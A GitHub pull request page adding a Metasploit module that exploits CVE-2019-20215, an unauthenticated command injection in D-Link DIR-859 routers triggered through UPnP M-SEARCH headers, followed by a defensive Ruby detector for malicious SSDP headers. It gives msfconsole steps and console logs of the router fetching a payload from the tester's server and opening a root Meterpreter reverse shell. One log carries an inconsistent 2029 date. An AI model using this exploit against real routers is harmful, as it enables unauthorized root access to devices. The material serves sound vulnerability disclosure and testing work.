
Cve 2019 20215 #12887

Merged
merged 5 commits into from Feb 5, 2020

Conversation

@s1kr10s
Contributor

s1kr10s commented Jan 28, 2020

Introduction

This module exploits CVE-2019-20215, an unauthenticated remote injection of operating system commands. The vulnerability was found in the ssdpcgi() function, and the payload can be injected through either the UUID or URN headers of an M-SEARCH UPnP request.

Vulnerable Application

Get a D-Link DIR-859 router (or any of the devices/firmware versions mentioned here), or download firmware versions 1.06 or 1.05 and run them on firmadyne or similar emulation frameworks.

Verification Steps

  1. Set up router/emulated device
  2. Start msfconsole
  3. Do: use exploit/linux/upnp/dlink_dir859_exec_ssdpcgi
  4. Do: set RHOSTS <router_ip>
  5. Do: set LHOST <local_ip>
  6. Do: set TARGET <URN/UUID>
  7. Do: run
  8. You should get a session as root.

Scenarios

D-Link DIR-859 Firmware 1.05

msf5 exploit(linux/upnp/dlink_dir859_exec_ssdpcgi) > run 
[*] Started reverse TCP handler on 192.168.0.2:4444 
[*] Using URL: http://0.0.0.0:8080/38YWEX2
[*] Local IP: http://192.168.70.28:8080/38YWEX2
[*] Target Payload URN
[*] Client 192.168.0.1 (Wget) requested /38YWEX2
[*] Sending payload to 192.168.0.1 (Wget)
[*] Command Stager progress - 100.00% done (110/110 bytes)
[*] Meterpreter session 1 opened (192.168.0.2:4444 -> 192.168.0.1:41057) at 2029-12-31 14:15:22 -0300
[*] Server stopped.
meterpreter > 

(Was PR #12769 @space-r7 @bcoles )

s1kr10s added 2 commits Jan 28, 2020
Staged, uses meterpreter
@space-r7 space-r7 self-assigned this Jan 28, 2020
s1kr10s added 2 commits Feb 4, 2020
... replace 'Targets' for a new option, and format 'header', as suggested in the review.
...  as stager flavor and silence msftidy error.

register_options(
[
Msf::OptEnum.new('VECTOR',[true, 'Header thrugh which to exploit the vulnerability', 'URN', ['URN', 'UUID']])

@space-r7

space-r7 Feb 5, 2020

Contributor
Suggested change
Msf::OptEnum.new('VECTOR',[true, 'Header thrugh which to exploit the vulnerability', 'URN', ['URN', 'UUID']])
Msf::OptEnum.new('VECTOR',[true, 'Header through which to exploit the vulnerability', 'URN', ['URN', 'UUID']])
@space-r7

Contributor

space-r7 commented Feb 5, 2020

Tested on emulated v1.05 firmware:

msf5 > use exploit/linux/upnp/dlink_dir859_exec_ssdpcgi 
msf5 exploit(linux/upnp/dlink_dir859_exec_ssdpcgi) > set rhosts 192.168.0.1
rhosts => 192.168.0.1
msf5 exploit(linux/upnp/dlink_dir859_exec_ssdpcgi) > set lhost 192.168.0.2
lhost => 192.168.0.2
msf5 exploit(linux/upnp/dlink_dir859_exec_ssdpcgi) > options

Module options (exploit/linux/upnp/dlink_dir859_exec_ssdpcgi):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOSTS   192.168.0.1      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT    1900             yes       The target port (TCP)
   SRVHOST  0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT  8080             yes       The local port to listen on.
   SSL      false            no        Negotiate SSL for incoming connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                   no        The URI to use for this exploit (default is random)
   VECTOR   URN              yes       Header through which to exploit the vulnerability (Accepted: URN, UUID)


Payload options (linux/mipsbe/meterpreter_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.0.2      yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Auto


msf5 exploit(linux/upnp/dlink_dir859_exec_ssdpcgi) > run

[*] Started reverse TCP handler on 192.168.0.2:4444 
[*] Using URL: http://0.0.0.0:8080/wP1bgrL7
[*] Local IP: http://127.0.0.1:8080/wP1bgrL7
[*] Target Payload URN
[*] Command Stager progress - 100.00% done (112/112 bytes)
[*] Client 192.168.0.1 (Wget) requested /wP1bgrL7
[*] Sending payload to 192.168.0.1 (Wget)
[*] Meterpreter session 1 opened (192.168.0.2:4444 -> 192.168.0.1:46802) at 2020-02-05 09:58:21 -0800
[*] Server stopped.

meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > sysinfo
Computer     : 192.168.0.1
OS           :  (Linux 2.6.32.70)
Architecture : mips
BuildTuple   : mips-linux-muslsf
Meterpreter  : mipsbe/linux
meterpreter > 

space-r7 added a commit that referenced this pull request Feb 5, 2020
@space-r7 space-r7 merged commit de25920 into rapid7:master Feb 5, 2020
3 checks passed
Metasploit Automation - Sanity Test Execution: Successfully completed all tests.
Metasploit Automation - Test Execution: Successfully completed all tests.
continuous-integration/travis-ci/pr: The Travis CI build passed
@space-r7

Contributor

space-r7 commented Feb 5, 2020

Release Notes

This exploits an unauthenticated command injection vulnerability for a subset of D-Link routers. Passing commands through either the uuid header or the urn header in an M-SEARCH request gets passed unsanitized to system(), allowing for code execution on the target.
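The unsanitized header path described in these release notes and in the PR introduction, seen from the detection side: an added Ruby example (not part of this PR or of the Metasploit module) that parses an SSDP M-SEARCH datagram and flags search-target values carrying shell metacharacters or not matching the uuid:/urn: grammar. It assumes the UUID/URN values travel in the ST header (the literal header names UUID and URN are scanned too, as an assumption), the grammars are simplified, and the sample datagrams are constructed.

```ruby
# Characters with no legitimate use in a UPnP search target.
SHELL_META = /[`$;&|<>(){}\\'"]/

# Simplified UPnP search-target grammars (assumption, not from the PR).
UUID_ST = /\A(ssdp:all|upnp:rootdevice|uuid:[0-9A-Fa-f-]{1,64})\z/
URN_ST  = /\Aurn:[A-Za-z0-9][A-Za-z0-9._-]*:(device|service):[A-Za-z0-9._-]+:\d+\z/

# The PR names the UUID and URN headers; in standard SSDP those values
# travel in ST, so ST is scanned, and the literal names as an assumption.
SCANNED_HEADERS = %w[ST UUID URN].freeze

# Split an HTTPU datagram into its request line and a header hash
# (names upcased; the first colon separates name from value).
def parse_ssdp(datagram)
  lines = datagram.split(/\r?\n/)
  request = lines.shift.to_s
  headers = {}
  lines.each do |line|
    next if line.strip.empty?
    name, _, value = line.partition(':')
    headers[name.strip.upcase] = value.strip
  end
  [request, headers]
end

# Returns { verdict: :ignore | :benign | :suspicious, reasons: [...] }.
def inspect_msearch(datagram)
  request, headers = parse_ssdp(datagram)
  return { verdict: :ignore, reasons: ['not an M-SEARCH request'] } unless request.start_with?('M-SEARCH ')

  reasons = []
  SCANNED_HEADERS.each do |name|
    value = headers[name]
    reasons << "shell metacharacter in #{name}" if value && value =~ SHELL_META
  end
  st = headers['ST']
  if st.nil?
    reasons << 'missing ST header'
  elsif st !~ UUID_ST && st !~ URN_ST
    reasons << 'ST does not match uuid:/urn: search-target grammar'
  end
  { verdict: reasons.empty? ? :benign : :suspicious, reasons: reasons }
end

# Constructed sample datagrams (not captured from a device).
BENIGN_MSEARCH = ['M-SEARCH * HTTP/1.1', 'HOST: 239.255.255.250:1900',
                  'MAN: "ssdp:discover"', 'MX: 2',
                  'ST: urn:schemas-upnp-org:device:basic:1', '', ''].join("\r\n")
SUSPICIOUS_MSEARCH = BENIGN_MSEARCH.sub('basic:1', 'basic:1;X')
```

Feed it the raw UDP payload of each packet arriving on 1900/udp; a legitimate discovery client never needs a metacharacter in its search target, so `:suspicious` is a low-noise alert.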
